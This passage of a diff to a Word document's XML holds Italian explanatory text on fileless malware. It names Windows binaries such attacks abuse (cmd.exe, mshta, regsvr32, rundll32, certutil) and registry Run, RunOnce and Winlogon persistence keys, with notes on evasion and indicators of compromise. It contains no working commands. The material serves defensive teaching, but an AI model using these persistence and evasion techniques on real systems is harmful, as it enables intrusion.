+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>legittmi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">”, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>possono creare danni al computer infetto.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>I comandi a cui prestare più attenzione sono quelli in cui compare:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">• </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>1. Chiavi di Esecuzione Automatica Standard (Autostart)</w:t>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>cmd</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>.exe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>: Viene utilizzato come interprete di comandi per avviare istruzioni concatenate tramite il parametro /c. Questo consente di eseguire una sequenza compatta di operazioni, come il download del payload, la sua esecuzione e la successiva eliminazione di eventuali tracce. La capacità di concatenare comandi e terminare immediatamente il processo contribuisce all’occultamento dell’attività malevola.</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Queste sono le più comuni, utilizzate per garantire che il comando (solitamente uno script </w:t>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">• </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>mshta</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>.exe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>: Gestisce le HTML Applications (.</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>PowerShell</w:t>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>hta</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> o MSHTA) venga eseguito a ogni avvio o login.</w:t>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) e permette l’esecuzione di codice JavaScript o </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>VBScript</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> da riga di comando o da URL remoto. Se richiamato tramite una chiave di registro, può eseguire uno script ospitato su un server esterno senza creare file locali, aggirando in alcuni casi i controlli di sicurezza del browser.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">• </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>r</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">egsvr32.exe: Strumento destinato alla registrazione delle DLL, può essere abusato per scaricare ed eseguire script remoti direttamente in memoria. Essendo un binario Microsoft firmato, il suo utilizzo può eludere sistemi di controllo basati su </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>whitelist</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> applicative, rendendo l’attività meno sospetta.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>• Rundll32.exe: È progettato per caricare ed eseguire funzioni contenute in librerie dinamiche. I malware fileless lo sfruttano per richiamare DLL di sistema e forzarle a interpretare codice malevolo come se fosse una funzione legittima, mascherando l’esecuzione all’interno di un processo affidabile.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">• </w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>1. HKEY_CURRENT_USE</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>R\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Software\Microsoft\Windows\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>CurrentVersion</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>\Run</w:t>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Certutil.exe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Utile</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> per la gestione dei certificati digitali, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">potrebbe essere </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>utilizzato come strumento di download o di decodifica. Può prelevare contenuti da server remoti oppure convertire stringhe codificate in Base64 memorizzate nel Registro in payload eseguibili, contribuendo alla strategia di attacco senza generare file evidenti sul disco.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:ind w:left="708"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Questa è la chiave di persistenza più utilizzata in assoluto per attacchi mirati all'utente.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="11"/>
-        </w:numPr>
-        <w:tabs>
-          <w:tab w:val="clear" w:pos="720"/>
-          <w:tab w:val="num" w:pos="1428"/>
-        </w:tabs>
-        <w:ind w:left="1428"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Spiegazione:</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> I comandi elencati qui vengono eseguiti ogni volta che l'utente specifico effettua l'accesso (logon).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="11"/>
-        </w:numPr>
-        <w:tabs>
-          <w:tab w:val="clear" w:pos="720"/>
-          <w:tab w:val="num" w:pos="1428"/>
-        </w:tabs>
-        <w:ind w:left="1428"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Perché il Fileless la usa:</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Non richiede privilegi di amministratore per essere modificata. Se un utente apre un allegato malevolo (macro), il malware può scrivere in questa chiave senza far scattare il prompt UAC (Controllo Account Utente).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="11"/>
-        </w:numPr>
-        <w:tabs>
-          <w:tab w:val="clear" w:pos="720"/>
-          <w:tab w:val="num" w:pos="1428"/>
-        </w:tabs>
-        <w:ind w:left="1428"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Esempio Fileless:</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Invece di un file, troverai una riga di comando che richiama </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>PowerShell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> per caricare un payload dalla RAM o da un'altra chiave di registro.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="708"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>2.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>HKEY_LOCAL_MACHINE</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>\...</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>\Run</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="12"/>
-        </w:numPr>
-        <w:tabs>
-          <w:tab w:val="clear" w:pos="720"/>
-          <w:tab w:val="num" w:pos="1428"/>
-        </w:tabs>
-        <w:ind w:left="1428"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Spiegazione:</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Simile alla precedente, ma i comandi qui presenti vengono eseguiti per </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>tutti gli utenti</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> del computer.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="12"/>
-        </w:numPr>
-        <w:tabs>
-          <w:tab w:val="clear" w:pos="720"/>
-          <w:tab w:val="num" w:pos="1428"/>
-        </w:tabs>
-        <w:ind w:left="1428"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Perché il Fileless la usa:</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Garantisce che il malware resti attivo indipendentemente da chi usa il PC. Tuttavia, richiede privilegi di amministratore per essere scritta. È il "passaggio successivo" dopo che il malware ha ottenuto l'escalation dei privilegi.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="708"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>3.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>HKEY_LOCAL_MACHINE</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>\...</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>RunOnce</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="13"/>
-        </w:numPr>
-        <w:tabs>
-          <w:tab w:val="clear" w:pos="720"/>
-          <w:tab w:val="num" w:pos="1428"/>
-        </w:tabs>
-        <w:ind w:left="1428"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Spiegazione:</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Come suggerisce il nome, Windows esegue il comando contenuto in questa chiave </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>una sola volta</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> e poi cancella automaticamente l'intera voce.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="13"/>
-        </w:numPr>
-        <w:tabs>
-          <w:tab w:val="clear" w:pos="720"/>
-          <w:tab w:val="num" w:pos="1428"/>
-        </w:tabs>
-        <w:ind w:left="1428"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Perché il Fileless la usa:</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> È perfetta per i "</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>dropper</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>" o i "loader" che servono solo a installare una persistenza più profonda o a scaricare il malware principale in memoria. Una volta fatto il lavoro, la traccia scompare da sola, rendendo l'analisi post-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>mortem</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> più difficile.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="708"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>4. HKEY_CURRENT_USER</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>...\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>RunOnce</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="14"/>
-        </w:numPr>
-        <w:tabs>
-          <w:tab w:val="clear" w:pos="720"/>
-          <w:tab w:val="num" w:pos="1428"/>
-        </w:tabs>
-        <w:ind w:left="1428"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Spiegazione:</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Versione per singolo utente della chiave sopra descritta.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="14"/>
-        </w:numPr>
-        <w:tabs>
-          <w:tab w:val="clear" w:pos="720"/>
-          <w:tab w:val="num" w:pos="1428"/>
-        </w:tabs>
-        <w:ind w:left="1428"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Perché il Fileless la usa:</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Spesso usata per eseguire script di pulizia o per reinserirsi ricorsivamente. Alcuni malware fileless scrivono nuovamente se stessi in questa chiave ogni volta che vengono eseguiti, in modo che sembri sempre una "prima esecuzione".</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="708"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>5. HKEY_LOCAL_MACHINE ... \</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>RunServices</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (Legacy)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="15"/>
-        </w:numPr>
-        <w:tabs>
-          <w:tab w:val="clear" w:pos="720"/>
-          <w:tab w:val="num" w:pos="1428"/>
-        </w:tabs>
-        <w:ind w:left="1428"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Spiegazione:</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Storicamente usata nelle versioni Windows 9x/Me per avviare processi in background prima del login dell'utente. Nei sistemi moderni (NT, Windows 10/11) non viene processata normalmente all'avvio del desktop.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="1428"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Viene monitorata dagli strumenti di sicurezza perché alcuni malware tentano di scriverci per "retro-compatibilità" o per ingannare analisti che usano vecchi strumenti di scansione.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="708"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>6. HKEY_LOCAL_MACHINE</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>... \</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>RunServicesOnce</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (Legacy)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="16"/>
-        </w:numPr>
-        <w:tabs>
-          <w:tab w:val="clear" w:pos="720"/>
-          <w:tab w:val="num" w:pos="1428"/>
-        </w:tabs>
-        <w:ind w:left="1428"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Spiegazione:</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> La versione "esegui una volta" della precedente.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="16"/>
-        </w:numPr>
-        <w:tabs>
-          <w:tab w:val="clear" w:pos="720"/>
-          <w:tab w:val="num" w:pos="1428"/>
-        </w:tabs>
-        <w:ind w:left="1428"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Contesto Tecnico:</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Valgono le stesse considerazioni di </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>RunServices</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>. Sebbene obsoleta, è un indicatore di compromissione (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>IoC</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>) se presente in un sistema moderno, poiché nessun software legittimo la utilizza più.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">2. Inizializzazione di Sistema e </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Winlogon</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Queste chiavi intervengono molto presto nel processo di boot, spesso prima che l'antivirus utente sia attivo.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="7"/>
-        </w:numPr>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Userinit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>CurrentVersion</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Winlogon</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Userinit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="7"/>
-        </w:numPr>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Tecnica:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Si appende il comando dopo </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>userinit.exe,.</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="7"/>
-        </w:numPr>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Shell: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>CurrentVersion</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
